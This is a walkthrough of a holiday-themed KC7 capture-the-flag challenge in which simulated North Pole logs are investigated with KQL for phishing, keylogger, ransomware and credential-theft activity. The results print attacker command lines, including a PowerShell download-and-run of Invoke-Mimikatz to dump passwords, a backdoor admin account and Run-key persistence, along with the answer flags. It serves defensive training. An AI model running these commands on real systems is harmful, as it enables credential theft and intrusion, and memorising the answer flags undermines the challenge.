Microsoft KC7
Answer two sections for silver, all four sections for gold.
Difficulty: ❄ ❄ ❄ ❄ ❄
Answer two sections for silver, all four sections for gold.
KQL 101
Learn and practice basic KQL queries to analyze data logs for North Pole operations.
Section 1: KQL 101
Question 1
Type let’s do this to begin your KQL training.
ANSWER: let's do this
Question 2
Once you’ve examined all the tables, type when in doubt take 10 to proceed.
ANSWER: when in doubt take 10
Question 3
How many elves did you find?
QUERY:
1
2
Employees
| count
RESULTS:
| Count |
|---|
90 |
ANSWER: 90
Question 4
Can you find out the name of the Chief Toy Maker?
QUERY:
1
2
3
Employees
| where role == "Chief Toy Maker"
| project name
RESULTS:
| name |
|---|
Shinny Upatree |
ANSWER: Shinny Upatree
Question 5
Type operator to continue.
ANSWER: operator
Question 6
Can you find out the name of the Chief Toy Maker?
QUERY:
1
2
3
4
Email
| join kind = inner Employees on $left.recipient == $right.email_addr
| where name == "Angel Candysalt"
| count
RESULTS:
| Count |
|---|
31 |
ANSWER: 31
Question 7
How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org?
QUERY:
1
2
3
4
Email
| where sender has "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count
RESULTS:
| Count |
|---|
32 |
ANSWER: 32
Question 8
How many distinct websites did Twinkle Frostington visit?
QUERY:
1
2
3
4
5
OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name == "Twinkle Frostington"
| distinct url
| count
RESULTS:
| Count |
|---|
4 |
ANSWER: 4
Question 9
How many distinct domains in the PassiveDns records contain the word green?
QUERY:
1
2
3
4
PassiveDns
| where domain contains "green"
| distinct domain
| count
RESULTS:
| Count |
|---|
10 |
ANSWER: 10
Question 10
How many distinct URLs did elves with the first name Twinkle visit?
QUERY:
1
2
3
4
5
OutboundNetworkEvents
| join kind=inner Employees on $left.src_ip == $right.ip_addr
| where name has "Twinkle"
| distinct url
| count
RESULTS:
| Count |
|---|
8 |
ANSWER: 8
Operation Surrender
Investigate a phishing attack targeting Wombley’s team, uncovering espionage activities.
Section 2: Operation Surrender: Alabaster’s Espionage
Question 1
Type surrender to continue.
ANSWER: surrender
Question 2
Who was the sender of the phishing email that set this plan into motion?
QUERY:
1
2
3
Email
| where subject contains "surrender"
| distinct sender
RESULTS:
| sender |
|---|
surrender@northpolemail.com |
ANSWER: surrender@northpolemail.com
Question 3
How many elves from Team Wombley received the phishing email?
QUERY:
1
2
3
4
Email
| where subject contains "surrender"
| distinct recipient
| count
RESULTS:
| count |
|---|
22 |
ANSWER: 22
Question 4
What was the filename of the document that Team Alabaster distributed in their phishing email?
QUERY:
1
2
3
4
Email
| where subject contains "surrender"
| extend filename = tostring(split(link, "/")[-1])
| distinct filename
RESULTS:
| filename |
|---|
Team_Wombley_Surrender.doc |
ANSWER: Team_Wombley_Surrender.doc
Question 5
Who was the first person from Team Wombley to click the URL in the phishing email?
QUERY:
1
2
3
4
5
6
Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| where url has "Team_Wombley_Surrender.doc"
| sort by timestamp asc
| limit 1
| project name
RESULTS:
| name |
|---|
Joyelle Tinseltoe |
ANSWER: Joyelle Tinseltoe
Question 6
What was the filename that was created after the .doc was downloaded and executed?
QUERY:
1
2
3
4
5
6
7
Employees
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip
| join kind=inner ProcessEvents on hostname and username
| where name has "Joyelle Tinseltoe" and url has "Team_Wombley_Surrender.doc" and timestamp1 > timestamp
| sort by timestamp1 asc
| limit 2
| project download_timestamp=timestamp, execution_timestamp=timestamp1, process_commandline, process_name
RESULTS:
| download_timestamp | execution_timestamp | process_commandline | process_name |
|---|---|---|---|
2024-11-27T14:11:45Z | 2024-11-27T14:12:44Z | Explorer.exe "C:\Users\jotinseltoe\Downloads\Team_Wombley_Surrender.doc" | Explorer.exe |
2024-11-27T14:11:45Z | 2024-11-27T14:12:45Z | C:\Users\Public\AppData\Roaming\keylogger.exe | keylogger.exe |
ANSWER:
The above results shows just 59s since downloading the file, Joyelle opened it (😡 bad user!), and the first event after that has the command line C:\Users\Public\AppData\Roaming\keylogger.exe which looks like a dropped executable.
The answer is the filename keylogger.exe.
Question 7
To obtain your flag use the KQL below with your last answer!
QUERY:
1
print base64_encode_tostring("keylogger.exe");
RESULTS:
| print_0 |
|---|
a2V5bG9nZ2VyLmV4ZQ== |
ANSWER: a2V5bG9nZ2VyLmV4ZQ==
Operation Snowfall
Track and analyze the impacts of a ransomware attack initiated by Wombley’s faction.
Section 3: Operation Snowfall: Team Wombley’s Ransomware Raid
Question 1
Type snowfall to begin
ANSWER: snowfall
Question 2
What was the IP address associated with the password spray?
QUERY:
1
2
3
4
5
AuthenticationEvents
| where result == "Failed Login"
| summarize dcount(username) by src_ip
| sort by dcount_username desc
| limit 1
RESULTS:
| src_ip | dcount_username |
|---|---|
59.171.58.12 | 44 |
ANSWER: 59.171.58.12
Question 3
How many unique accounts were impacted where there was a successful login from 59.171.58.12?
QUERY:
1
2
3
4
AuthenticationEvents
| where result != "Failed Login" and src_ip == "59.171.58.12"
| distinct username
| count
RESULTS:
| count |
|---|
23 |
ANSWER: 23
Question 4
What service was used to access these accounts/devices?
QUERY:
1
2
3
4
AuthenticationEvents
| where src_ip == "59.171.58.12" and result != "Failed Login"
| extend service = tostring(split(split(description, " ")[-1], ".")[0])
| distinct service
RESULTS:
| service |
|---|
RDP |
ANSWER: RDP
Question 5
What file was exfiltrated from Alabaster’s laptop?
QUERY:
1
2
3
4
5
6
AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp and process_commandline has "copy"
| sort by timestamp1 asc
| project timestamp1, process_commandline
RESULTS:
| timestamp1 | process_commandline |
|---|---|
2024-12-15T14:52:13Z | Copy-Item "C:\\Malware\\EncryptEverything.exe" -Destination "C:\\Windows\\Users\\alsnowball" |
2024-12-15T14:52:32Z | copy C:\Windows\Users\alsnowball\top secret\Snowball_Cannon_Plans.pdf C:\Users\alsnowball\Documents\Snowball_Cannon_Plans.pdf |
2024-12-16T14:53:27Z | copy C:\Windows\Users\alsnowball\top secret\Drone_Configurations.pdf C:\Users\alsnowball\Documents\Drone_Configurations.pdf |
2024-12-16T15:51:52Z | copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip |
ANSWER:
From ProcessEvents we can observe some copy commands being executed but just copy C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip \\wocube\share\alsnowball\Secret_Files.zip pointing to an external destination and copying out C:\Users\alsnowball\AppData\Local\Temp\Secret_Files.zip.
The answer is the filename Secret_Files.zip.
Question 6
What is the name of the malicious file that was run on Alabaster’s laptop?
QUERY:
1
2
3
4
5
AuthenticationEvents
| join kind=inner Employees on hostname
| join kind=inner ProcessEvents on hostname
| where name == "Alabaster Snowball" and src_ip == "59.171.58.12" and result != "Failed Login" and timestamp1 > timestamp
| distinct process_name
RESULTS:
| process_name |
|---|
cmd.exe |
svchost.exe |
msedgewebview2.exe |
powershell.exe |
EncryptEverything.exe |
searchprotocolhost.exe |
comppkgsrv.exe |
Copy-Item |
ANSWER:
Among the other commands executed on Alabaster’s machine after the successful login of the IP 59.171.58.12 the one that stands out the most is EncryptEverything.exe. The answer is the name of such command EncryptEverything.exe.
Question 7
To obtain your flag use the KQL below with your last answer!
QUERY:
1
print base64_encode_tostring("EncryptEverything.exe");
RESULTS:
| print_0 |
|---|
RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl |
ANSWER: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl
Echoes in the Frost
Use logs to trace an unknown phishing attack targeting Alabaster’s faction.
Section 4: Echoes in the Frost: Tracking the Unknown Threat
Question 1
Type stay frosty to begin
ANSWER: stay frosty
Question 2
What was the timestamp of first phishing email about the breached credentials received by Noel Boetie?
QUERY:
1
2
3
4
5
Email
| where subject has "credentials"
| sort by timestamp asc
| project timestamp
| limit 1
RESULTS:
| timestamp |
|---|
2024-12-12T14:48:55Z |
ANSWER: 2024-12-12T14:48:55Z
Question 3
When did Noel Boetie click the link to the first file?
QUERY:
1
2
3
4
5
6
7
Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner OutboundNetworkEvents on $left.ip_addr == $right.src_ip, $left.link == $right.url
| where subject has "credentials" and timestamp1 > timestamp
| project timestamp1
| sort by timestamp1 asc
| limit 1
RESULTS:
| timestamp1 |
|---|
2024-12-12T15:13:55Z |
ANSWER: 2024-12-12T15:13:55Z
Question 4
What was the IP for the domain where the file was hosted?
QUERY:
1
2
3
4
5
Email
| where subject has "credentials"
| extend domain = tostring(split(link,"/")[2])
| join kind=inner PassiveDns on domain
| distinct ip
RESULTS:
| ip |
|---|
182.56.23.122 |
ANSWER: 182.56.23.122
Question 5
Let’s take a closer look at the authentication events. I wonder if any connection events from 182.56.23.122. If so what hostname was accessed?
QUERY:
1
2
3
AuthenticationEvents
| where src_ip == "182.56.23.122"
| distinct hostname
RESULTS:
| hostname |
|---|
WebApp-ElvesWorkshop |
ANSWER: WebApp-ElvesWorkshop
Question 6
What was the script that was run to obtain credentials?
QUERY:
1
2
3
4
AuthenticationEvents
| join kind=inner ProcessEvents on hostname
| where src_ip == "182.56.23.122" and timestamp1 > timestamp
| project process_commandline
RESULTS:
| process_commandline |
|---|
net user frosty AllYourBaseBelongToUs /add |
powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords" |
net view /domain |
net localgroup administrators frosty /add |
ipconfig /all |
tasklist | findstr /I "mcshield.exe" |
tasklist | findstr /I "norton.exe" |
tasklist | findstr /I "avp.exe" |
ANSWER:
Looking at the commands executed after the authentication of 182.56.23.122 we can observe the command line powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords" that downloads Invoke-Mimikatz.ps1 and then execute it.
The answer is the script name Invoke-Mimikatz.ps1.
Question 7
What is the timestamp where Noel executed the file?
QUERY:
1
2
3
4
5
6
7
8
Email
| join kind=inner Employees on $left.recipient == $right.email_addr
| join kind=inner ProcessEvents on hostname
| extend filename = tostring(split(link, "/")[-1])
| where subject has "credentials" and process_commandline has filename
| project timestamp1, process_commandline
| sort by timestamp1 asc
| limit 1
RESULTS:
| timestamp1 | process_commandline |
|---|---|
2024-12-12T15:14:38Z | Explorer.exe "C:\Users\noboetie\Downloads\echo.exe" |
ANSWER: 2024-12-12T15:14:38Z
Question 8
What domain was the holidaycandy.hta file downloaded from?
QUERY:
1
2
3
4
OutboundNetworkEvents
| where url has "holidaycandy.hta"
| extend domain = tostring(split(url,"/")[2])
| distinct domain
RESULTS:
| domain |
|---|
compromisedchristmastoys.com |
ANSWER: compromisedchristmastoys.com
Question 9
what was the first file that was created after extraction?
QUERY:
1
2
3
4
5
6
ProcessEvents
| join kind=inner FileCreationEvents on hostname
| where process_commandline has "frosty.zip" and timestamp1 > timestamp
| sort by timestamp1 asc
| distinct filename
| limit 1
RESULTS:
| filename |
|---|
sqlwriter.exe |
ANSWER: sqlwriter.exe
Question 10
What is the name of the property assigned to the new registry key?
QUERY:
1
2
3
4
ProcessEvents
| join kind=inner ProcessEvents on hostname
| where process_commandline has "frosty.txt" and timestamp1 > timestamp
| project process_commandline1
RESULTS:
| process_commandline1 |
|---|
tar -xf C:\\Windows\\Tasks\\frosty.zip -C C:\\Windows\\Tasks\\ |
New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force |
ANSWER: frosty
Question 11
To obtain your FINAL flag use the KQL below with your last answer!
QUERY:
1
print base64_encode_tostring("frosty");
RESULTS:
| print_0 |
|---|
ZnJvc3R5 |
ANSWER: ZnJvc3R5